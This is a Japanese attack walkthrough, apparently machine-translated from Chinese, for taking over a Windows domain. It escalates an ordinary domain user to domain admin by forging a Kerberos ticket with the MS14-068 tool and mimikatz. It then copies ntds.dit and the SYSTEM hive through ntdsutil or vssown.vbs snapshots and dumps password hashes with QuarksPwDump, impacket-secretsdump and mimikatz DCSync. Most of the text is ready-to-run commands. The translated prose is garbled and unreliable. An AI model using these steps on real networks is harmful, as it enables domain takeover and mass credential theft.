使用プロセス
1.脆弱性迷彩法案を活用します
2.エクスポートドメインのハッシュ値
3.ハッシュ値は、使用をクラック
まず、迷彩法案を活用
条件
ドメイン名、SIDの名前を知っている、と一般的なドメインのユーザーのアカウントのパスワードを持って、そしてコントロールのドメイン知識
ステップ
1. SIDを取得し、共通のドメインユーザーのマシンを取得します
whoami /all
2.ドメイン名、コントロールを取得したドメイン名
ドメイン取得:
ipconfig /all
クエリドメインコントローラ:
net time /domain
3.アップロード14068py.exe、コマンドラインコマンド法案迷彩は、TGTは、現在のディレクトリ内のファイルを生成します。
14068py.exe -u 域用户全称 -p "密码" -s sid -d 域控名全称
ユーザーフルネーム:ユーザ名@ドメイン
すべてのノートを削除するにはklistをパージを入力します
5.アップロードmimikatz.exe、コマンドを入力します。ちょうど装った法案
mimikatz.exe "kerberos::ptc xxxxx" exit
TGTはただのxxxxxで生成されたファイル名を置き換えます
6.成功を置き換える、klistを表示する法案を入力します。
7.ノー・パスワードを記述、ドメインコントローラのCドライブのリストを表示するためのもので、ノートは成功は、ドメイン管の身元を偽装しました
dir \\域控全称\c$
第二に、エクスポートドメインのハッシュ値
・取得し、取得したハッシュのNtds.ditを分析
思考
1.ノートに成功リモート接続した後、迷彩、スケジュールされたタスクを使用して、またはリモートコマンド実行制御DCを実行する(直接の実験は、DCでここに使用スケジュールされたタスクを実施したり、リモートコマンド実行制御を実行DCの使用の詳細にジャンプするには、ここをクリックし)
2。得るためにツールを使用して、ハッシュ値フィールドを取得するために分析します
1.取得のNtds.dit
ntdsutilの(win8の後に来る)輸出のNtds.ditを使用して1.1
1.1.1対話型シェル:
インタラクティブインタフェースにNTDSUTIL入力
入力スナップショット機能
活動の例としては、NTDS設定します
activate instance ntds
入力したスナップショットを作成します
Cドライブをマウントし、スナップショット、今回はそこにスナップショットのように、ディスクCとCディスクコンテンツとなって、そして占有していません
mount 快照名
指定したパスにスナップショットの下のコピーのNtds.dit、ntdsutilを終了します(オフライン分析は、Windows \ System32に\ CONFIG \ SYSTEM、省略オンライン分析でスナップショットをコピーする必要があります)
copy C:\$SNAP_202003310959_VOLUMEC$\Windows\NTDS\ntds.dit c:\
再びntdsutilのスナップショット機能を入力し、削除スナップショット
ntdsutil
snapshot
unmount 快照名
1.1.2非対話型シェル:
一度にスナップショットを作成するには、次のコマンドを入力して終了
ntdsutil snapshot "activate instance ntds" create quit quit
ちょうど生成されたスナップショットをマウントするには、次のコマンドを入力します。
ntdsutil snapshot "mount 快照名" quit quit
指定したパスにスナップショットの下のコピーのNtds.dit(オフライン分析は、Windows \ System32に\ CONFIG \ SYSTEM、省略オンライン分析でスナップショットをコピーする必要があります)
copy C:\$SNAP_202003311014_VOLUMEC$\Windows\NTDS\ntds.dit c:\ntds1.dit
スナップショットを削除します
ntdsutil snapshot "unmount 快照名" quit quit
1.2 vssown.vbsエキスのNtds.dit
アップロードスクリプトと実行中のスクリプト
cscript vssown.vbs /start
実行中のステータスを表示
cscript vssown.vbs /status
Cドライブのスナップショットを作成します。
cscript vssown.vbs /create C
情報のスナップショットを見ます
cscript vssown.vbs /list
\\?\ GLOBALROOT \デバイス\ HarddiskVolumeShadowCopy1が道路cのディスクスナップショットのルートディレクトリです
コピーはのNtds.ditにカレントディレクトリにスナップショット
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit ntds.dit
SYSTEMディレクトリ内の現在のスナップショットをコピーします(オフライン分析のニーズ、オンライン分析省略)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM SYSTEM
作成したスナップショットの削除
cscript vssown.vbs /delete *
停止スクリプト
cscript vssown.vbs /stop
2.分析のNtds.dit
2.1 QuarkPwDumpは、オンライン分析を使用
QuarkPwDump.exeは、ターゲットマシンのCにアップロード:/
ドメインユーザーパスワードでコマンドGETのNtds.ditを入力します。
QuarksPwDump.exe --dump-hash-domain --with-history --ntds-file ntds.dit路径
impacket-secretsdumpのオフライン分析で2.2カーリー使用
カーリーに生成されたNtds.ditおよびSYSTEMをコピーします
ターミナルは、クラックのNtds.ditにコマンドを入力します。
impacket-secretsdump -ntds ntds.dit -system SYSTEM local
・Mimikatzエキスハッシュ
条件
これは、シェル通常のドメインメンバーのマシンを得ることができます
ステップ
迷彩14068で上記の直流リモート接続の注意事項に基づいて、
ソフトウェアにMimikatz.exe入力
ユーザーが指定したドメインのハッシュ値を抽出します
lsadump::dcsync /domain:域名 /user:用户名 /csv